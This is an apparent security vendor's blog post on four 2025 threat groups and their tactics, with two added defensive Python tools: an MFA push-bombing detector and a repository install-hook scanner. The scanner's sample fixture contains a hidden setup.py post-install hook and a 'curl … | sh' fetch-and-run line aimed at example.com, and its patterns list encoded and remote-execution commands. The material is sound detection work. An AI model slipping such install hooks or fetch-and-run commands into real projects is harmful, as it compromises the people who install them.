I was one of 12 cybersecurity leaders invited to take part in a recent IT Channel Oxygen article on the most memorable cyber-attacks of 2025 so far.
However, these attacks can only really be understood by looking at the wider threat landscape and how it is evolving.
It’s fair to say that a new wave of threat actors and ransomware threats has come to the fore in 2025 (including some that target security professionals like us). These threat actors are innovative, well funded and well motivated.
Which amongst them have emerged as the biggest threat, and how should cyber providers like Sapphire be advising customers to combat them?
As news of yet another massive cyber-attack hits the headlines (this time at airline Qantas), here are four to look out for…
- Scattered Spider – predominantly retail, most recently
The retail industry has come under sustained and escalating attack.
Scattered Spider has historically targeted one sector at a time, using a successful compromise to pivot to further victims in the same sector. Recently they have focused on retail and insurance, and the latest reports indicate a shift towards aviation.
Their initial focus on retail may be explained by the sector being particularly exposed to customer pressure and negative publicity during service disruptions. Other contributing factors may include lighter regulation of cyber defences, greater supply chain complexity and higher workforce turnover.
Scattered Spider is known for spear-phishing, social engineering and custom malware, including infostealers such as Lumma Stealer, whose command-and-control infrastructure was recently disrupted by an international law enforcement operation supported by Microsoft.
Their techniques are diverse and keep evolving, but at their core the initial access strategy still rests on expertise in phishing, smishing and MFA exhaustion (repeatedly pushing MFA prompts until a worn-down user approves one). Once credentials and supporting information are gathered, they escalate privileges by methods such as impersonating staff to help desk personnel to get passwords or MFA reset, then create backdoor access and additional accounts to evade detection and achieve their objectives.
Mitigation guidance focuses on a multi-faceted response covering cyber security hygiene (strong endpoint controls, cloud and infrastructure controls, detection and response capability, segregation of duties, encryption, backups and so on) but also the human protections. Additionally, DLP (data loss prevention) solutions such as Microsoft Purview can help build detections for this type of insider risk, as can investment in UEBA (user and entity behaviour analytics). Microsoft has published guidance on this that is worth a read.
Scattered Spider represents threat actor tradecraft that is evolving and maturing in 2025: alongside malware deployment, the focus is on manipulating human interactions and borrowing legitimate identities to exploit trust. As we continue to digitise we must keep investing in our foundational technical, policy and procedural controls, technologies and defences, but we must not forget that securing the perimeter now means securing identities.
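As an added example (not code from the original post, nor anything from Sapphire or Microsoft), here is detection logic for the MFA exhaustion step described above, run over constructed sign-in records. The field names, the result codes, the five-pushes-in-ten-minutes threshold and the "approval after the burst" escalation rule are all assumptions to be tuned against your own IdP's logs:

```python
"""Detect MFA push-bombing ('MFA exhaustion') in sign-in telemetry.

Added example, not from the original post. The record shape, result codes and
thresholds are assumptions; a real feed (e.g. Entra ID sign-in logs or an IdP
audit API) needs a small mapping onto these fields.
"""
from __future__ import annotations

import json
from collections import defaultdict
from datetime import datetime, timedelta

FAILURE_RESULTS = {"mfa_denied", "mfa_timeout"}  # assumed codes: pushes the user did not accept
APPROVED_RESULT = "mfa_approved"
PUSH_THRESHOLD = 5               # assumption: 5+ unaccepted pushes ...
WINDOW = timedelta(minutes=10)   # ... inside 10 minutes looks like bombing, not fat fingers

# Constructed sample records (not real telemetry), one JSON object per line.
SAMPLE_LOGS = """\
{"ts": "2025-06-30T08:00:05Z", "user": "alice@example.com", "result": "mfa_denied", "ip": "203.0.113.7"}
{"ts": "2025-06-30T08:00:40Z", "user": "alice@example.com", "result": "mfa_timeout", "ip": "203.0.113.7"}
{"ts": "2025-06-30T08:01:30Z", "user": "alice@example.com", "result": "mfa_denied", "ip": "203.0.113.7"}
{"ts": "2025-06-30T08:02:15Z", "user": "alice@example.com", "result": "mfa_denied", "ip": "203.0.113.7"}
{"ts": "2025-06-30T08:03:40Z", "user": "alice@example.com", "result": "mfa_timeout", "ip": "203.0.113.7"}
{"ts": "2025-06-30T08:04:50Z", "user": "alice@example.com", "result": "mfa_denied", "ip": "203.0.113.7"}
{"ts": "2025-06-30T08:05:30Z", "user": "alice@example.com", "result": "mfa_approved", "ip": "203.0.113.7"}
{"ts": "2025-06-30T09:10:00Z", "user": "bob@example.com", "result": "mfa_denied", "ip": "198.51.100.4"}
{"ts": "2025-06-30T09:45:00Z", "user": "bob@example.com", "result": "mfa_denied", "ip": "198.51.100.4"}
{"ts": "2025-06-30T10:00:00Z", "user": "carol@example.com", "result": "mfa_denied", "ip": "198.51.100.22"}
{"ts": "2025-06-30T10:02:00Z", "user": "carol@example.com", "result": "mfa_timeout", "ip": "198.51.100.22"}
{"ts": "2025-06-30T10:04:00Z", "user": "carol@example.com", "result": "mfa_denied", "ip": "198.51.100.22"}
{"ts": "2025-06-30T10:06:00Z", "user": "carol@example.com", "result": "mfa_denied", "ip": "198.51.100.22"}
{"ts": "2025-06-30T10:08:00Z", "user": "carol@example.com", "result": "mfa_timeout", "ip": "198.51.100.22"}
{"ts": "2025-06-30T11:00:00Z", "user": "dave@example.com", "result": "mfa_approved", "ip": "192.0.2.9"}
"""


def parse_logs(text: str) -> list[dict]:
    """Parse newline-delimited JSON records; 'ts' becomes an aware datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
        events.append(rec)
    return events


def detect_push_bombing(events: list[dict], threshold: int = PUSH_THRESHOLD,
                        window: timedelta = WINDOW) -> list[dict]:
    """Flag users with `threshold` or more unaccepted pushes inside `window`.

    If an approval follows the burst within the same window, severity is raised:
    that is the signature of a worn-down user finally tapping Approve.
    """
    by_user: dict[str, list[dict]] = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)

    findings = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["result"] in FAILURE_RESULTS]
        start = 0
        for end in range(len(failures)):
            # Slide the window start forward until the span fits inside `window`.
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            if end - start + 1 < threshold:
                continue
            # Threshold reached: extend the burst to every later failure still in the window.
            last = end
            while (last + 1 < len(failures)
                   and failures[last + 1]["ts"] - failures[start]["ts"] <= window):
                last += 1
            burst = failures[start:last + 1]
            burst_end = burst[-1]["ts"]
            approved_after = any(e["result"] == APPROVED_RESULT
                                 and burst_end <= e["ts"] <= burst_end + window for e in evs)
            findings.append({
                "user": user,
                "pushes_rejected": len(burst),
                "first": burst[0]["ts"].isoformat(),
                "last": burst_end.isoformat(),
                "source_ips": sorted({e["ip"] for e in burst}),
                "approved_after": approved_after,
                "severity": "high" if approved_after else "medium",
            })
            break  # one finding per user is enough for triage
    return findings


if __name__ == "__main__":
    for finding in detect_push_bombing(parse_logs(SAMPLE_LOGS)):
        print(json.dumps(finding))
```

The "approval after the burst" case is the one to page on; the follow-on hunt is for what that session did next (new MFA device registration, a help desk password reset, a freshly created privileged account). Longer term, number matching or phishing-resistant MFA removes the "just tap Approve" option that this whole technique depends on.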
- Medusa – active in retail and other consumer-facing businesses, as well as CNI and manufacturing.
Using techniques such as bring-your-own-vulnerable-driver (BYOVD), where a legitimately signed but exploitable driver is loaded so that security tooling can be disabled from kernel mode, they have bypassed some traditional endpoint detection capabilities to install their encryptor.
Ultimately, threat actors are evolving new techniques and reinvigorating older ones to evade detection and achieve their end goals.
This means thinking in terms of multiple layers of protection, with EDR (endpoint detection and response) as the minimum. Ransomware attacks succeed in their hundreds of thousands each year, many against organisations with top-tier, well-configured endpoint management in place, so it is clear that EDR alone is not enough.
Ransomware-specific protections working in harmony with broader EDR capabilities, and with telemetry from the rest of the security architecture, are vital.
- Anubis – The Anubis ransomware has been observed with a new wiper module, meaning that even if victims pay the ransom they can still lose their data. It has targeted healthcare, hospitality and construction.
What’s interesting here is that this Ransomware-as-a-Service group has set up a tiered affiliate model, with affiliates taking a share of the proceeds. Since February they have been offering three options:
- Traditional RaaS (Ransomware-as-a-Service) affiliates, who encrypt and extort, receive 80% of the ransom;
- A data ransom option (60% of the ransom), where money is extorted on the basis of exfiltrated data; and
- Access monetisation (50% of ransom proceeds), where already-compromised victims are further attacked and extorted.
This shows continued evolution in the ransomware model and the proliferation of attackers. These are criminal enterprises run like conventional businesses, expanding their channels to market and offering service wraps and help desks.
Understanding your organisation’s attack surface and threat actor tradecraft, and protecting the perimeter, are part of the defensive posture that makes you a less attractive target. So is having an XDR/EDR solution, and the processes around it, that enable a fast response: detecting and isolating any host with ransomware present as soon as possible.
This strengthens the case for investing in automation, so that when ransomware is detected the response (automatically isolating or quarantining the host, for example) happens without waiting for a human and response times are minimised.
- Water Curse – a recent threat actor group using weaponised GitHub repositories, offering what appear to be legitimate pen-testing and security tools, to deliver malware.
Clever, huh… offering free security tooling to attack you with. Who says criminals can’t be smart?
This is interesting because it targets security professionals such as consultants and penetration testers, knowing that the community legitimately shares tooling and tradecraft in this way.
This tactic is similar to that used by threat actors targeting security professionals with fake ‘job interviews’. The ‘recruiter’ sends the candidate a link to a malicious code repository under the guise of a ‘coding challenge’, and the candidate unwittingly installs malware while completing it. The elevated insider risk this creates calls for a multi-disciplinary, cross-functional defence effort that is not limited to the SOC and supply chain risk; it often involves strengthening HR and recruitment processes too.
Implications – it boils down to social engineering, partially mitigated by security awareness training and increased personnel vetting on both sides of the recruitment process.
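As an added example (not the original post's code, and not a description of how Water Curse's or the fake-recruiter repositories were actually built), here is a pre-flight check to run on a cloned "security tool" or "coding challenge" before `pip install .` or `npm install`. It looks for the generic ways a repository can run code at install time rather than when you use the tool. The sample repository, the pattern list and the verdict rule are all constructed assumptions:

```python
"""Pre-flight check of a cloned 'security tool' repo for install-time code execution.

Added example, not from the original post and not a description of any specific
group's repositories. It flags generic indicators that a package runs code merely by
being installed; the sample repo is constructed in a temp dir so this runs offline.
"""
from __future__ import annotations

import json
import re
import tempfile
from pathlib import Path

NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare")  # run automatically by `npm install`
INSTALL_FILES = {"setup.py", "setup.cfg", "pyproject.toml", "package.json", "Makefile", "install.sh"}
TEXT_SUFFIXES = {".py", ".js", ".ts", ".sh", ".ps1", ".cfg", ".toml", ".json", ""}

# Generic patterns worth a human look; a hit means "read this", not proof of malice.
PATTERNS = {
    "shell_exec": re.compile(r"os\.system|subprocess\.(run|Popen|call|check_output)|child_process|execSync"),
    "dynamic_eval": re.compile(r"\b(exec|eval)\s*\("),
    "decode_payload": re.compile(r"base64\.b64decode|Buffer\.from\([^)]*[\"']base64[\"']\)|FromBase64String"),
    "fetch_and_run": re.compile(r"https?://\S+\s*\|\s*(ba)?sh\b|DownloadString|Invoke-WebRequest|Invoke-Expression|\bIEX\b|-EncodedCommand"),
    "setuptools_hook": re.compile(r"cmdclass\s*=|class\s+\w+\((install|develop|egg_info)\)"),
}


def scan_repo(root: Path, max_bytes: int = 1_000_000) -> list[dict]:
    """Return one finding per suspicious line, plus one per npm lifecycle hook."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or ".git" in path.parts or path.suffix not in TEXT_SUFFIXES:
            continue
        if path.stat().st_size > max_bytes:
            continue
        rel, text = str(path.relative_to(root)), path.read_text(encoding="utf-8", errors="replace")
        install_time = path.name in INSTALL_FILES  # executes on install, not on use
        if path.name == "package.json":
            try:
                scripts = json.loads(text).get("scripts") or {}
            except ValueError:
                scripts = {}
            for hook in NPM_HOOKS:
                if hook in scripts:
                    findings.append({"file": rel, "line": 0, "kind": "npm_hook",
                                     "install_time": True, "snippet": f"{hook}: {scripts[hook]}"})
        for lineno, line in enumerate(text.splitlines(), 1):
            for kind, rx in PATTERNS.items():
                if rx.search(line):
                    findings.append({"file": rel, "line": lineno, "kind": kind,
                                     "install_time": install_time, "snippet": line.strip()[:120]})
    return findings


def verdict(findings: list[dict]) -> str:
    """'block' if anything runs at install time, 'review' for runtime-only hits, else 'ok'."""
    if any(f["install_time"] for f in findings):
        return "block"
    return "review" if findings else "ok"


def build_sample_repo(base: Path) -> Path:
    """Write a constructed look-alike recon tool; the 'payloads' are harmless echoes."""
    root = base / "redteam-recon"
    (root / "scripts").mkdir(parents=True)
    (root / "README.md").write_text("# redteam-recon\nFast port recon.\n")
    (root / "recon.py").write_text(  # the advertised tool: benign, no hits expected
        "import socket\n\ndef is_open(host, port):\n    with socket.socket() as s:\n"
        "        s.settimeout(1)\n        return s.connect_ex((host, port)) == 0\n")
    (root / "setup.py").write_text(  # setuptools override: runs on `pip install .`
        "from setuptools import setup\nfrom setuptools.command.install import install\n"
        "import base64, subprocess\n\nclass PostInstall(install):\n    def run(self):\n"
        "        install.run(self)\n"
        "        subprocess.run(base64.b64decode('ZWNobyBoZWxsbw==').decode(), shell=True)\n\n"
        "setup(name='redteam-recon', version='0.1', cmdclass={'install': PostInstall})\n")
    (root / "package.json").write_text(json.dumps({  # npm hook: runs on `npm install`
        "name": "redteam-recon", "version": "0.1.0",
        "scripts": {"postinstall": "node scripts/setup.js", "test": "echo ok"}}, indent=2))
    (root / "scripts" / "setup.js").write_text(
        "const { execSync } = require('child_process');\n"
        "execSync('curl -s https://example.com/bootstrap.sh | sh');\n")
    return root


def demo() -> dict:
    """Build, scan and summarise the sample repo (also what the accompanying test checks)."""
    with tempfile.TemporaryDirectory() as tmp:
        findings = scan_repo(build_sample_repo(Path(tmp)))
    return {"verdict": verdict(findings),
            "kinds": sorted({f["kind"] for f in findings}),
            "install_time_files": sorted({f["file"] for f in findings if f["install_time"]})}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

A hit is a reason to read the code, not a conviction: plenty of legitimate tools shell out or fetch updates. The scanner also only marks the hook file itself as install-time, so when a postinstall script calls another file (as scripts/setup.js does above) follow the chain by hand. Better still, build and run unknown tooling in a disposable VM or container with no access to client data or credentials.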
So far this year I’d say these are the top four. Ask me in six months’ time and I suspect Anubis will have moved up the rankings, and new, innovative attack vectors will be emerging. This return to data destruction is interesting and potentially devastating for organisations; these are extinction-level events, not just because of the cost and distraction but because of the reputational damage.
It will mean some organisations take years to recover, if they ever do (Hackney Council is still mopping up nearly five years after its well-publicised 2020 attack).
So what are the biggest risk areas for organisations, exploited by these attackers?
- Insider threat – people remain the weakest link in the security chain. Training and awareness are essential but not enough; deploying DLP (data loss prevention) and UEBA (behavioural analytics) solutions provides a safety net.
- Supply chain – disruption in your supply chain can be just as damaging as a direct attack, as can the software you use and the integrations you have built. How well do you know your suppliers, and how well do you know their security?
- Single-layer protection – firewalls used to be enough, but haven’t been for a long time; endpoint protection, well configured and monitored 24×7, makes a big difference but is no longer enough on its own. Some form of UEBA and/or one of the emerging anti-ransomware solutions is increasingly necessary for high-profile sectors such as retail, healthcare, CNI and financial services.